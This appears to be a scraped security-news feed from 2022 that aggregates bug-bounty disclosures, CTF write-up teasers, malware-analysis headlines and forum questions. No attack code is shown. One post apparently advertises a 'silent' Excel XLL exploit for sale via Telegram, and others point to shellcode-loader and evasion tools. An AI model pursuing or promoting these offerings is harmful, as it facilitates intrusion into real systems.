    Vulnerability management policies considered harmful to shipping secure software
    Article URL: https://haydock.substack.com/p/security-release-criteria Comments URL: https://news.ycombinator.com/item?id=32324806 Points: 3 # Comments: 0
    Hacker Probably Targeting Auth Option Update Vulnerability in Make's WP Plugin
    Article URL: https://www.pluginvulnerabilities.com/2022/08/02/hacker-probably-targeting-this-authenticated-option-update-vulnerability-in-makes-wordpress-plugin/ Comments URL: https://news.ycombinator.com/item?id=32322219 Points: 1 # Comments: 0
    Rsync client-side arbitrary file write vulnerability
    Article URL: https://www.openwall.com/lists/oss-security/2022/08/02/1 Comments URL: https://news.ycombinator.com/item?id=32318155 Points: 128 # Comments: 36

    Web Cache Poisoning via an Unkeyed Input
    Hello, I am SNISS and today I am going to talk about a vulnerability found a lot recently, called Web Cache Poisoning Continue reading on Medium »
    Monthly Update: July 2022
    Dear community. Continue reading on Medium »
    Stored XSS to Account Takeover : Going beyond document.cookie
    Stealing Session Information From IndexedDB Continue reading on Medium »
    How I cleared(hacked) all my traffic cases with just ₹100- BugBounty [BangaloreTrafficPolice]
    Note:- It's just a bug report to the Paytm and BangaloreTrafficPolice, KarnatakaOne websites, with 5-star severity, hope they fix nothing… Continue reading on Medium »
    Why Every Organization Should have a Bug Bounty Program
    Introduction Continue reading on Medium »
    Moonbeam team releases urgent security patch for integer truncation bug
    On Monday, June 27, 2022, Moonriver and Moonbeam received an urgent update via runtime 1606 to resolve a… Continue reading on Medium »
    Multiple bugs in one program leads to 1500€
    Hi, today I‘m going to talk about three basic vulnerabilities that I discovered in the same program and were rewarded with 1500€. Continue reading on InfoSec Write-ups »
    How I earned 500$ by uploading a file: write-up of one of my first bug bounty
    This is the write-up of one of the first vulnerabilities that I found 3 years ago. It’s a little late, but better late than never, right? Continue reading on Medium »
    KLEX FINANCE TESTNET QUICK GUIDE
    KLEX is an implementation of the Balancer v2 Protocol on Klaytn. Continue reading on Medium »

    [WriteUp] OhSINT — TryHackMe
    Beginner-friendly OSINT room to sharpen your skills Continue reading on Medium »
    Threat Intelligence Tools — TryHackme Walkthrough
    Explore different OSINT tools used to conduct security threat assessments and investigations. Continue reading on Medium »
    War in Ukraine / August 1
    Day 160: An important moment for the Ukrainian counteroffensive Continue reading on Medium »
    Is OSINT legal or ethical?
    In the US and the UK, OSINT is legal, but security teams need to stay within a clearly defined framework, which is agreed with their… Continue reading on Medium »

    Can kernel debugging be done between different processor architectures?
    Sorry if this sounds like a noob question. When it comes to Kernel Debugging, HackSys Team's HEVD seems to be the go-to for practice. In write-ups, we see that we need to set up 2 VMs and set up baud rate, etc. Essentially, trying to replicate the hard-wired debugging across machines with Ethernet cables that was performed before VMs came along. The baud rate is matched between windbg running on both VMs and a Pipe is set up between both VMs. Can this be done between different processor architectures? Ex: I have a Win10 VM on an x86_64 arch machine (Debuggee) and another Win10 VM on a MacBook Pro (Debugger). Since the MacBook uses ARM arch, the debugger will obviously show ARM instructions (if I were to debug an application that's already on the MacBook). Now, is there a way I can debug the x86_64 programs on the Debuggee VM from my ARM VM? If I'm not making sense, let me know. I'm pretty new to this and I'm trying to learn. submitted by /u/ScrotumHair

    DFIR career trajectory and goals - what would you do differently if you could go back in time?
    I’m new to the DFIR field, and I’m wondering what some of you, that have been in the field for years, would do if you could go back in time? What are some things to think about or consider as you go forward in your career? I’m young and inexperienced, so it’d be cool to hear about any tips or advice you might have for a newcomer in this field. submitted by /u/tfulab23

    SecWiki News 2022-08-02 Review
    No news updated today~ For more recent articles, visit SecWiki

    One-click account hijack for anyone using Apple sign-in with Reddit, due to response-type switch + leaking href to XSS on www.redditmedia.com
    Reddit disclosed a bug submitted by fransrosen: https://hackerone.com/reports/1567186 - Bounty: $10000
    Found Origin IP's lead to access to gitlab
    GitLab disclosed a bug submitted by m-narayanan: https://hackerone.com/reports/1637577

    Selected session videos from the Zero Trust Security Forum now online | CIS Conference Summer Edition
    For the CIS Conference Summer Edition, FreeBuf invited several industry leaders for an in-depth discussion and outlook on zero trust security, hoping to offer enterprises and users some reference points and inspiration on the topic.
    FreeBuf Morning Report | Experts say the Twitter leak is bad; QQ Music starts showing users' IP location
    The news that the data of 5.4 million Twitter users is for sale on the dark web may shock many, but this may be only the tip of the iceberg.
    Zero trust has been hot for more than a decade, so why still can't it be put into practice?
    For enterprise customers, what is the core driver for fully implementing zero trust, and what is the future development path of zero trust technology?
    A real-world record: from CAPTCHA bypass to unauthorized access
    A record that was 90% luck and 10% skill.
    BlackCat claims responsibility for the attack on Creos
    The ALPHV ransomware gang, also known as BlackCat, has claimed responsibility for the cyberattack on the Luxembourg company Creos.
    Over 3,200 apps leaked Twitter API keys
    Cybersecurity researchers discovered a set of unusual mobile apps that expose Twitter API keys to the public.
    Raccoon malware upgraded; password theft efficiency greatly increased
    Security experts at Zscaler published an analysis of a new variant of the Raccoon Stealer malware.
    Research finds attackers can abuse the Chromium browser bookmark sync feature to exfiltrate data
    Bookmarks can be abused to siphon large amounts of stolen data out of enterprise environments, or to deploy attack tools and malicious payloads into them with little chance of detection.
    Analysis of the latest Raccoon Stealer v2 sample
    Raccoon is an information-stealing malware that can steal private data such as passwords, cookies and autofill data from browsers.

    Learn SQL injection in practice by hacking vulnerable application! — StackZero
    No content preview
    How to Setup BurpSuite on Linux
    No content preview
    Is CSRF really dead? Examining Stripe’s $5000 CSRF bug bounty.
    Testing for CSRF can be worth it. Continue reading on InfoSec Write-ups »

    Threat analysis visualization?
    Hi peeps, I'm a SOC analyst and I was wondering if there's a software to visualize threats and incidents. I wanna create something like a timeline and such. I know I could just use visio or any other software like it but I was wondering if there's something specific for InfoSec. Thanks ;) submitted by /u/MenaHabib_

    HackTheBox — Dancing
    Dancing is a boot2root machine on HackTheBox. It is “Very Easy” difficulty and is part of Tier 0 starting point challenges. Continue reading on Medium »

    NimicStack: Call Stack Spoofing in Nim
    submitted by /u/DarkGrejuva

    Movies and Series
    Dunno about speeds or even if it's been posted before... http://88.99.99.152/ submitted by /u/DodgyguyNZL

    The Story of an Extortion Case
    I am using fake names in this story. The story is that there was this person that Zachery was talking to on a dating site. He was sadly… Continue reading on Medium »
    War in Ukraine / July 29–31
    Day 159: The food deal seems to have worked Continue reading on Medium »
    TryHackMe | WebOSINT Writeup
    TryHackMe’s WebOSINT room, finding information that no longer exists. Continue reading on Medium »

    using wget terminal command to download your needed stuff/download stuff recursively
    ########### brought to you by the guy who knows a little bit about linux
    = what is wget? : it is a GNU computer program that retrieves content from web servers (long story short, a free software terminal program that can batch download websites and what people post on this sub.)
    = why do i need it? : sometimes it's annoying to click thousands of links to download files instead of just using a free software solution that will crawl and download everything for you.
    === how do i install wget?
    = windows : windows now has a builtin package manager (thanks linux) winget install GnuWin32.Wget or install the choco package manager then do this choco install wget
    = linux: easy mode sudo pacman -S wget sudo dnf install wget sudo apt install wget (i think you don't need to do this since it maybe a…
    Windows comedy ISOs!
    submitted by /u/Plastic_Preparation1
    maths lecture notes
    submitted by /u/PM_ME_TO_PLAY_A_GAME

    Changing region settings in Caine 12.4
    Hello Everyone, I'm using Caine 12.4 for image acquisition because it defaults to read only and, well, I like it. Everything except for the fact that the region settings are set to Italian by default. It's a small thing, but I'd, at minimum, like to see the dates in English and prefer if the region was set to Canada, and the time zone to mountain time (Whitehorse, Yukon). I can do this manually after booting, but I've found the only way to get it to work properly is to set the time zone to mountain, set the region to Canada, and delete Italian from the language list (without deleting the language the dates still display in Italian). So I'm wondering what I would need to edit in the iso to switch the region and timezone defaults, or at the very least remove Italian from the installed languages. If anyone can help me out with this it would be greatly appreciated. submitted by /u/thenebular
    Upcoming skills test
    Hello all, please delete if not allowed. I have an interview and skills test at the end of the month for an analyst position with an ICAC unit for a law enforcement agency. I am fresh out of college and although I did take some digital forensic courses, the majority of my course work had a heavy emphasis on physical evidence. The job duties of the position are primarily to conduct research and perform field previews when necessary. I have no information on what the skills test will contain. What would you recommend I try to study before taking the test? This is an entry level position, so the test will likely not contain much material on complex techniques. Any help would be greatly appreciated. submitted by /u/No-Librarian4750
    MemProcFS - This Changes Everything
    Good morning, It’s time for a new 13Cubed episode! This one covers a tool that I truly believe is revolutionary. Imagine being able to "mount" memory as if it were a disk image. With a single command, MemProcFS will create a virtual file system representing the processes, file handles, registry, $MFT, and more. The tool can be executed against a memory dump, or run against memory on a live system. This is a game changer for memory forensics! Episode: https://www.youtube.com/watch?v=hjWVUrf7Obk Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed

    SSTImap - Automatic SSTI detection tool with interactive interface
    SSTImap was developed as a new SSTI detection tool based on Tplmap. The main feature of this tool and a key difference with Tplmap is the interactive mode, which enhances detection and exploitation. Also, the payload for Smarty was changed to work without the {{php}}{{/php}} tag, which was disabled by default in Smarty 3.0. New payloads for other template engines will be developed. https://github.com/vladko312/SSTImap submitted by /u/vladko312

    Threat Modeling Field Guide
    submitted by /u/sanitybit
    SSTImap - Automatic SSTI detection tool with interactive interface
    submitted by /u/vladko312
    A Detailed Analysis of the RedLine Stealer
    submitted by /u/CyberMasterV

    Most Common Attacks in android Apps | InsecureShop
    InsecureShop is an Android application written in Kotlin that is designed to be intentionally vulnerable. It is a great asset for… Continue reading on Medium »
    How I get Full Account Takeover via stealing action’s login form | XSS
    Today I will explain How I get Full Account Takeover via stealing the action of the login form when you have XSS on the login page. Continue reading on Medium »
    PORTSWIGGER - Command Injection Vulnerabilities LAB Solutions
    Hi friends, today I will talk about the Command Injection vulnerability and explain the solutions to the labs on Portswigger. Continue reading on Medium »
    July Monthly Update
    July went by so fast! While we have so much to share, be sure to believe that we have much more planned for the next couple months. If you… Continue reading on Medium »
    ‘PTN’ infosec monthly #2 — InfoSec Updates
    Namaste everyone, Welcome to our ‘PTN’ infosec monthly #2 and we are back with the second newsletter with PTN Anniversary special updates… Continue reading on Pentester Nepal »
    How I earned $10,000 within the last 7 months — 17y/o Edition
    you know that I mostly earn bounties in Cryptocurrencies and this leads to the answer → I mostly hunt on XXXXXXXXXXXX Continue reading on InfoSec Write-ups »
    This SIMPLE vulnerability in Shopify earned a $2500 bug bounty
    Don’t forget to check for user access rights Continue reading on InfoSec Write-ups »
    Responder Starting Point HacktheBox Walkthrough
    Responder Starting Point is a very good Challenge by HackTheBox. In this article we are going to exploit it. Continue reading on Medium »
    Intigriti’s July 0722 XSS Challenge Writeup
    I. Overview Continue reading on Medium »
    VAPT — Common & Uncommon Interview Questions! Episode-1
    Here are some of the amazing interview questions that we came across and wanted to share with you. Continue reading on Medium »

    X Stock Seems Boring but has Big Upside Potential | Utradea
    Based on the overall X stock forecast of $32.62 per share (derived from P/E & EPS, and comparable valuations), and the current price of X… Continue reading on Medium »

    Faraday – open-source Vulnerability Management
    Article URL: https://faradaysec.com/community-v4/ Comments URL: https://news.ycombinator.com/item?id=32309146 Points: 4 # Comments: 2

    LastPass vs Bitwarden
    Been using LastPass for years. I've been happy until my Windows 10 work laptop had an issue. The LastPass browser plugin sucks up 100% CPU. Never had this issue before. Switched to Bitwarden with no issues. Questions: Has anyone else seen this issue? Which password manager would you recommend? Any issues with Bitwarden security? Note: I find Bitwarden a bit clunky for day to day use. Not as slick as LastPass. Other than that I don't have a problem with it. And I kinda like the desktop app. Thanks! submitted by /u/damienhull
    How do you deal with the identity crisis caused by cybersecurity?
    Well, I [M27] have been interested in security since high school, and I have been working in the field for 4 years now between engineering and IR. I'm kinda good at what I do, had my OSCP 3 years ago, with a good background in many security fields, but now and then I feel that I want to get out of my comfort zone. I find people in the industry sharing everything on linkedin, doing podcasts that nobody listens to and posting infosec memes on their twitter where they have 7 followers, as if anybody is interested. I'm not sure if it's a social issue but I rarely talk about cybersecurity on my social media or with friends and prefer sharing memes that are not related to cybersecurity. Over time I feel that I have 2 personalities; I feel sad sometimes that I hate showing off and there are people who like showing off because they got a 4-letter business certificate with no technical knowledge. Anybody feel the same? submitted by /u/xoutisx
    Will having secret clearance take me far in Security if I don’t intend to work for the govt. long term?
    I’m more interested in working for bigger companies doing security than I am for the government- but most important to me is opening doors. If doing cybersecurity for the govt. for a few years gives me plenty of opportunities for working in other companies, I don’t mind doing it. I have two job offers and one is a threat analyst for a bigger company that’s well known in this industry, and the other is a security analyst for a government contractor and I can get a secret clearance. Haven’t decided which one will be a bigger step for my career. My end goal is to become a security engineer. One of these will be my first cybersecurity job. submitted by /u/Good-Turnip-8963

    SecWiki News 2022-08-01 Review
    Basic AV Evasion Techniques on Windows by SecIN Community; SecWiki Weekly (Issue 439) by ourren. For more recent articles, visit SecWiki

    Go Fuzzing
    What is Fuzzing? Continue reading on Towards Dev »

    Insecure TLS Configuration #3530
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1639423
    delete the subaccount from the user id
    Showmax disclosed a bug submitted by qualwin38000: https://hackerone.com/reports/1646340 - Bounty: $700
    Insecure use of shell.openExternal() in Rocket.Chat Desktop App leading to RCE
    Rocket.Chat disclosed a bug submitted by baltpeter: https://hackerone.com/reports/924151
    Race condition on https://judge.me/people
    Judge.me disclosed a bug submitted by netboom: https://hackerone.com/reports/1566017 - Bounty: $250

    HackTheBox — Fawn
    Fawn is a boot2root CTF on HackTheBox. It is “Very Easy” difficulty and is part of Tier 0 starting point challenges. Continue reading on Medium »
    PortSwigger Web Security Academy Lab: SQL injection vulnerability in WHERE clause allowing…
    PortSwigger Web Security Academy Lab: SQL injection Continue reading on Bilişim Hareketi »
    Kerberos
    Hey friends, it is the second article in my Active Directory Theory and Exploitation series. Today, I would like to talk about Kerberos… Continue reading on Medium »

    IW Weekly #13: 1000s of user tokens exposed, pre-auth RCEs in Oracle, AWS Misconfigurations, IDOR…
    No content preview
    Cybersecurity Learning Path
    No content preview
    Zero-day XSS
    No content preview
    Why this EASY vulnerability resulted in a $20,000 bug bounty from GitLab
    The hidden dangers of numerical IDs Continue reading on InfoSec Write-ups »
    This SIMPLE vulnerability in Shopify earned a $2500 bug bounty
    Don’t forget to check for user access rights Continue reading on InfoSec Write-ups »

    FreeBuf Morning Report | Nationwide cyber law enforcement achieved notable results in the first half of the year; US House of Representatives passes the Ransomware Act
    In the first half of 2022, the national cyberspace administration system continued to step up cyber law enforcement, standardize enforcement practices, and resolutely investigate and punish all kinds of illegal and non-compliant cases in accordance with the law, achieving notable results.
    MBDA suspected breached; attackers claim to have obtained confidential data
    An attack group calling itself Adrastea claims to have breached the multinational missile manufacturer MBDA.
    A huge network of 11,000 fake investment websites "targets" Europe
    Researchers discovered a huge network of more than 11,000 domains promoting fake investment schemes to European users.
    Dahua cameras had a security vulnerability, which has now been fixed
    Through this vulnerability, an attacker could obtain the highest privileges and unrestricted access to affected devices, including live viewing and replaying camera video.
    17 DawDropper banking malware apps found in the Google Play Store
    These apps included document scanners, VPN services, QR code readers and call recorders, and together carried four banking trojan families: Octo, Hydra, Ermac and TeaBot.
    VeinMind: a complete walkthrough of using a container security detection tool
    I have recently been surveying open-source container security tools at home and abroad and found many excellent projects. Foreign projects such as trivy and anchor already do very well on vulnerability detection; there are not many domestic projects, and even fewer tools that focus on anything other than vulnerability detection, so for the open-source container security tool named 问脉 (VeinMind)…

    should i delete this since the code may not actually be used in production
    submitted by /u/ParkingMobile2095

    Virtual Images for Testing
    Many within the DFIR community make use of virtual systems for testing...for detonating malware, trying things within a "safe", isolated environment, etc. However, sometimes it can be tough to get hold of suitable images for creating that testing environment. I've collected a bunch of links to VirtualBox VMs for Windows, but I cannot attest to all of them actually working. But, if you'd like to try any of them, here they are...
    - MS Edge developer virtual machines (Win7 - 10, limited time)
    - Windows 7 Image, reports no activation needed
    - Win95 virtual machine
    - Various MS virtual machines (MS-DOS, Windows, etc.)
    - Windows 11 Dev Environment (eval)
    - Use Disk2vhd to create a virtual machine from an existing installation
    - ReactOS - clone of Windows 5.2 (XP/2003)
    There's no shortage of Linux and Unix variant OS VMs available. For example, you can find Solaris VMs here. For MacOS Big Sur, you can try this site. Back in 1994 and '95, while I was in graduate school, I went to Fry's Electronics in Sunnyvale (across the street from a store called "Weird Stuff") and purchased a copy of OS/2 2.1. I did that because the box came with a $15 coupon for the impending OS/2 Warp 3.0. If you'd like to give the OS/2 Warp OS a shot, you can try this v4.52 download, or try this site for other versions of OS/2. If you're a fan of CommodoreOS, you can give this site a shot. For AmigaOS, try here, or here. How about Plan9?
    General Download Sites
    - OSBoxes
    - SysProbs
    - VirtualBoxes
    Hope that helps!

    Top 10 most rated OSINT Tools on Github
    We’re a little fed up with OSINT tools claiming they’re the best. So, we spent some time looking at some hard facts from Github. After… Continue reading on Medium »
    Officer_CIA X MaxWayld: Content Overview
    Greetings dear readers! Today I present to your attention an article written by my good friend Max — in it he made a review of more than a… Continue reading on Medium »
    The Art of Angle In GEO-OSINT Investigation
    Hey, my name is Satyam Jaiswal and in this blog, I want to share how sometimes in the OSINT investigation especially in GEO OSINT, the idea Continue reading on Medium »
    How to detect and neutralize a network of malicious sites? (case study)
    Detection, comprehensive analysis and elimination of malicious, spam and phishing pages, URLs, links and sites. Continue reading on KR. LABORATORIES IT BLOG »
    SPY NEWS: 2022 — Week 30
    Summary of the espionage-related news stories for the Week 30 (July 24–30) of 2022. Continue reading on Medium »

    intigriti Challenge 0722 by Vroemy
    Another awesome XSS challenge from Intigriti. Personally, I learn a lot trying to solve these monthly challenges by Intigriti. The… Continue reading on Medium »
    How to Exploit CSRF (Cross Site Request Forgery) in Web Applications — Pentester Academy Challenge
    Introduction Continue reading on Medium »
    Why this EASY vulnerability resulted in a $20,000 bug bounty from GitLab
    The hidden dangers of numerical IDs Continue reading on InfoSec Write-ups »
    Vulnerabilities Scan
    Vulnerabilities Scan: 15000+PoCs; 20 kinds of application password crack; 7000+Web fingerprints; 146 protocols and 90000+ rules Port… Continue reading on Medium »
    MSA Weekly 5 — “How to Get Sensitive Data Exposure on Web Application”
    Hi hiii, here we meet again. This time the author will try to explain sensitive data exposure and how we can… Continue reading on Medium »
    Do you need to be a programming pro to hack?
    Hacking is always presented in the media by thousands of lines of code flashing on a person’s laptop. Is this reality? Continue reading on Medium »
    Buffer Overflow: Understanding CPU Registers
    Hello Security folks, In previous article, we came to know about Stack, How Application memory works and Memory Addresses. In this article… Continue reading on Medium »
    Crocodile Starting Point HackTheBox Challenge Walkthrough.
    Crocodile is a really awesome challenge by HackTheBox to practice skills related to Hacking. In today’s writeup we are going to solve this… Continue reading on Medium »

    What is this site doing? [blackscreen]
    This site starts some service worker and seems to download/upload something just by loading what is just literally a black screen. It also created 66kb worth of cookies which I had to delete. Any insight on what it might be trying to do? This is one of the first results in google if you search for a black screen. The idea of searching for a black screen or any color is just to have a solid background for whatever reason like taking screenshots, but I think it's trying to do something fishy. submitted by /u/PlatformKnuckles
    What is WMAgent?
    I found this CVE-2022-34558 which states that a WMAgent is vulnerable. I have searched the internet but I didn't understand much. submitted by /u/Chroll-On
    Q: Security risk of a permanent Fritzbox-VPN connection with my parents network?
    Hello everyone, I started in the last months to educate myself more and more about privacy and cyber security. I have also started to host services and data locally. I also started to improve my network infrastructure through various services (pi-hole... etc.). Now I have also started the mission to educate my parents about this and make them aware of their digital footprint and threats. I also had the idea to use the Fritzbox VPN to connect the networks and make elements of my network infrastructure accessible to them so they do not need to build up a redundant infrastructure and maintain it. Now I would like to avoid securing myself first and then exposing myself to unmanageable/unknown risks with such a connection to my parents' network. I would love to understand the risk of network-wide threats better (e.g. malware that affects the whole network across the VPN? ...). Moreover, I cannot evaluate the security of the Fritzbox VPN (google results say it's ok?) (Unfortunately, their Fritzbox is a bit older and will not support Wireguard). The alternative is to simply set up easy things such as a pihole on a raspi that I can prepare and easily set up, but not going with the "permanent connection" solution. I would love to learn from you guys how big the risk of such network-wide threats is and how you would rate the Fritzbox VPN. Thanks! submitted by /u/DonSiffo
    Roadmap for getting into cyber forensics?
    I’m a junior penetration tester. Currently looking to pivot into a different area as I’m realizing that pentesting isn’t for me. My initial thought was to switch to something less technical, but before I make that change I wanted to give forensics some consideration as I’ve always thought it would be cool to explore that. I know nothing about it though so I wanted to see if there are any of y’all out there that currently work in cyber forensics and ask if A) someone switching from penetration testing would feel comfortable in a forensics role and if a pentesting background would lead to success in forensics and B) any information on how to get started. What resources to start looking at, certifications to explore, jobs to consider that would lead to a smooth transition from pentesting into forensics, etc. submitted by /u/anon2user
    Lightning Port HDMI Dongle (Amazon)
    I was considering buying an HDMI dongle from Amazon vs the original Apple one to save a few bucks. I’m thinking this could contain some sort of implant but am trying to understand if there is a way for me to check this before putting it on my device. Are others experienced with how to trace if this is stealing my data? submitted by /u/jeepynomad

    Active Exploitation of Atlassian’s Questions for Confluence App CVE-2022-26138
    Article URL: https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/ Comments URL: https://news.ycombinator.com/item?id=32298575 Points: 1 # Comments: 0

    Learning about data security technology and the market
    Security vendors' understanding of data security still needs to catch up with the level of attention the state gives it, with more investment and a further step forward.
    What is it like to fight on home ground in an attack-defense exercise? (social engineering + close-access)
    A dream red team operation, fought on home ground, with rich results.

    SecWiki News 2022-07-31 Review
    An Overview of Security Knowledge Graph Technology by ourren; Malware Analysis Tools 2022 by ourren. For more recent articles, visit SecWiki

    Men of The Auxiliary Division of the Royal Irish Constabulary, listed alphabetically
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    tools
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Pictures of Adventure Time show
    Highly NSFW comics https://drive.google.com/drive/mobile/folders/0B42kNriZcp4cLWlwSDlQYXdIOFE?usp=sharing&resourcekey=0-MrZHfmBcSPlHVIKzTBJIyQ submitted by /u/RainyAbrar

    How can I determine whether artefacts in Safari are local or synced?
    If they are synced artefacts - what device identifier is available? submitted by /u/zoomjua
    Digital Forensic Introduction Video
    In this video, I have covered the following content:
    1) What is Cyber Crime?
    2) What are the different types of cybercrime?
    3) Forensics Investigation Procedure
    4) Effective Strategy for CISOs for Forensics Requirements
    5) Top tools
    6) Good Evidence Principles
    7) What is "Chain of Custody?"
    https://www.youtube.com/watch?v=u2zgEFm5RHQ submitted by /u/prabhnair1

    EDR Blindness, pt II
    As a follow-on to my earlier blog post, I've seen a few more posts and comments regarding EDR 'bypass' and blinding/avoiding EDR tools, and to be honest, my earlier post stands. However, I wanted to add some additional thoughts...for example, when considering EDR, consider the technology, product, and service in light of not just the threat landscape, but also the other telemetry you have available.  This uberAgent article was very interesting, in particular the following statement: “DLL sideloading attack is the most successful attack as most EDRs fail to detect, let alone block it.” The simple fact is, EDR wasn't designed to detect DLL side loading, so this is tantamount to saying, "hey, I just purchased this brand new car, and it doesn't fly, nor does it drive underwater...".  Joe Stock…
  • Open

    Weekend Wrap-up of Infosec News
    submitted by /u/SuaveHobo [link] [comments]
    CQ, a code security scanner
    submitted by /u/0xdea [link] [comments]
  • Open

    Open S3 Bucket Accessible by any Aws User
    GoCD disclosed a bug submitted by khalidou: https://hackerone.com/reports/1654145
  • Open

    HackTheBox — Meow
    Meow is a boot2root CTF on HackTheBox. It has the difficulty “very easy” and is part of the Tier 0 Starting Point machines. Continue reading on Medium »
  • Open

    Silent excel xll exploit - telegram : mave12x
    submitted by /u/SarahEliset [link] [comments]

  • Open

    Abwaab Data Leak
    Over 2.26 million users' data leaked from the Abwaab Jordan platform. Continue reading on Medium »
    Zero-day XSS
    Hello Cyber Security Enthusiast. I’m back again with another article of XSS. In this article, I’ll explain how I got an unexpected XSS and… Continue reading on InfoSec Write-ups »
    How I Earned €150 in 2 Minutes | HTML injection in email
    Introduction : Continue reading on Medium »
    Authentication Bypass
    Hello folks, Continue reading on Medium »
    Cross-function re-entrancy in the wild
    After many catastrophic, tragic incidents in the past, I believe that everyone will have heard about this so-called “re-entrancy” attack… Continue reading on Medium »
    Sequel Starting Point HackTheBox Challenge Tier 1 WriteUp
    Sequel is a really nice challenge by HacktheBox to Practice Hacking skills. So in this writeup we are going to dive into it. Continue reading on Medium »
  • Open

    Pokemon-Shellcode-Loader: Tired of looking at hex all day and popping '\x41's? Rather look at Lugia/Charmander? I have the solution for you.
    submitted by /u/Techryptic [link] [comments]
    CVE-2022-36123 - Linux kernel <5.18.13 lacks a certain clear operation for the block starting symbol (.bss). This allows Xen PV guest OS users to cause a denial of service, or gain privileges.
    submitted by /u/docker-osx [link] [comments]
  • Open

    Running Exploit As Protected Process Light From Userland
    A tool called RunAsWinTcb uses a userland exploit to run a DLL with the protection of Protected Process Light (WinTcb-Light signer type). Blog about the vulnerability and tool: https://tastypepperoni.medium.com/running-exploit-as-protected-process-ligh-from-userland-f4c7dfe63387 The tool: https://github.com/tastypepperoni/RunAsWinTcb submitted by /u/tasty-pepperoni [link] [comments]
  • Open

    A Newbie need some help with patch analysis
    Hi there, a year ago I started my career in AppSec as a penetration tester. But what I want to learn now is patch analysis. Basically, when a CVE gets released the vendor releases a patch. But the issue I am facing is finding the patch itself. Yes, GitHub is the right place to look, but there are so many commits out there; how do you identify the right commit to analyse the patch so that you can develop your own exploit or maybe find a bypass? Any help is appreciated. submitted by /u/wh0am1root [link] [comments]
  • Open

    x-ways editing event log definition file.
    Question for anyone that uses X-Ways. I am trying to edit the exvt definition file that parses out Windows events on X-Ways. I want to add some other events to it. However, when I edit the text document that holds the information for it and save it, there is no change. I even tried to process the case again; no change. Anyone have any ideas on this? submitted by /u/divinealpha12 [link] [comments]
    Transition from Government to Private Sector
    I am looking to transition to private sector after 8 years of digital forensics in a law enforcement capacity. Are there any hiring managers out there that can give advice on what you look for or possibly provide resume critique? submitted by /u/outdorksman [link] [comments]
  • Open

    Arris / Arris-variant DSL/Fiber router critical vulnerability exposure
    Article URL: https://derekabdine.com/blog/2022-arris-advisory.html Comments URL: https://news.ycombinator.com/item?id=32288020 Points: 77 # Comments: 22
  • Open

    SecWiki News 2022-07-30 Review
    No news updated today. For more recent articles, visit SecWiki.
  • Open

    HacktheBox [Late]
    Full Nmap TCP scan shows port 80 and 22 open: Continue reading on Medium »
    RED TEAM ASSESSMENT SERVICE IN DELHI
    Definition Continue reading on Medium »
  • Open

    Cross Site Scripting Vulnerability (XSS)
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1650210
    Open redirection at https://smartreports.mtncameroon.net
    MTN Group disclosed a bug submitted by vulnera: https://hackerone.com/reports/1530396
  • Open

    To the pentesters, what's in your kit bag?
    Found the same thread from 8 years ago and am wondering about new answers and the current kit. So to the pentesters, what do you carry in your bag for pentests at the customer's location? submitted by /u/namelessOnReddit_ [link] [comments]
    Is this attack possible or just a scare tactic ?
    I was browsing regarding vpns and a website said this, "Even when you are using a VPN it is possible to find out who you are by looking at your Hostname, Computer name or MAC address by those on the web or local network. If you're for example using torrents it is possible to see your Computer ID. If someone really wants to find out who you are, they can by creating a simple algorithm to track your Computer ID patterns in torrent networks. Same method can be applied to all types of networks." Is this true or just a scare tactic ? submitted by /u/zilla005 [link] [comments]
    SANS MSISE - employment waiver
    Personal background: Active duty Navy aviation electronics technician. Four years remaining on my contract. Currently on track to finish B.S. in cybersecurity in Spring 2023. I've started looking into graduate programs; namely at my current institution but also the SANS Information Security Engineering program. I've heard varying opinions on the ROI of a masters degree; but between my Navy tuition assistance and GI-Bill, I could have the program funded. Not to mention the certifications that the program would lead to. All that said, I'm wondering if anyone has experience with getting the graduate admissions employment requirement waived. As an aviation electronics technician I work with computers and classified material; mostly aircraft systems, classified computer systems, COMSEC, etc. With that in mind, I'm not certain I would be able to apply all the concepts directly. Would mentioning a home lab setup bolster my chances? submitted by /u/SlipshodRaven [link] [comments]
  • Open

    GSuite domain takeover through delegation
    No content preview
  • Open

    Key points of Vietnam's data compliance rules
    Vietnam's emphasis on the digital economy is plain to see; data compliance, as the core compliance requirement of the digital economy, deserves the attention of every company expanding into Vietnam.
  • Open

    Officer_CIA: Retrospective
    Here is a retrospective of my best articles! You can also track my work entirely at my start.me (always use mullvad.net when visiting it)… Continue reading on Medium »

  • Open

    Persistence Using Windows Terminal “Profiles”
    Profiles All The Way Down Continue reading on Medium »
  • Open

    Possible to make restricted files public on Phabricator via Diffusion
    Phabricator disclosed a bug submitted by dyls: https://hackerone.com/reports/1560717 - Bounty: $2000
    Send Fax from Anyone's HelloFax Account Due to Misconfigured Email Validation
    Dropbox disclosed a bug submitted by sayaanalam: https://hackerone.com/reports/1428385 - Bounty: $4913
    @nextcloud/logger NPM package brings vulnerable ansi-regex version
    Nextcloud disclosed a bug submitted by ro0telqayser: https://hackerone.com/reports/1607601
  • Open

    IDOR on the NFT marketplace naksh.org
    Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied… Continue reading on Medium »
    Business Logic Vulnerabilities == $$$
    According to OWASP , Business Logic Vulnerabilities are ways of using the legitimate processing flow of an application in a way that… Continue reading on Medium »
    5 easy ways to detect the clickjacking vulnerability
    Hello everyone, I am Vignesh, a 20-year-old Security Researcher from TamilNadu, India. Continue reading on Medium »
    How this team accidentally found a SSRF in Slack exposing AWS credentials! A $4000 bug bounty
    Complex libraries lead to hidden attack vectors Continue reading on InfoSec Write-ups »
    EAZI FINANCE TESTNET QUICK GUIDE
    ABOUT EAZI FINANCE Continue reading on Medium »
    ASN — Autonomous System Networks
    some` some` Continue reading on Medium »
    Hakrawler — information gathering tool for bug bounty hunters
    In this tutorial, Im just wanna talk about another hacking tool which developed for penetration testers and specially bug bounty hunters. Continue reading on Medium »
    Hacking the photographer
    Hi guys! Guess who’s back…back again! This blog will be great I could teach you a lot of things, this time to show you how I rooted the… Continue reading on Medium »
    Networking Fundamentals — for Ethical Hacking & Bug Hunting (day-3)
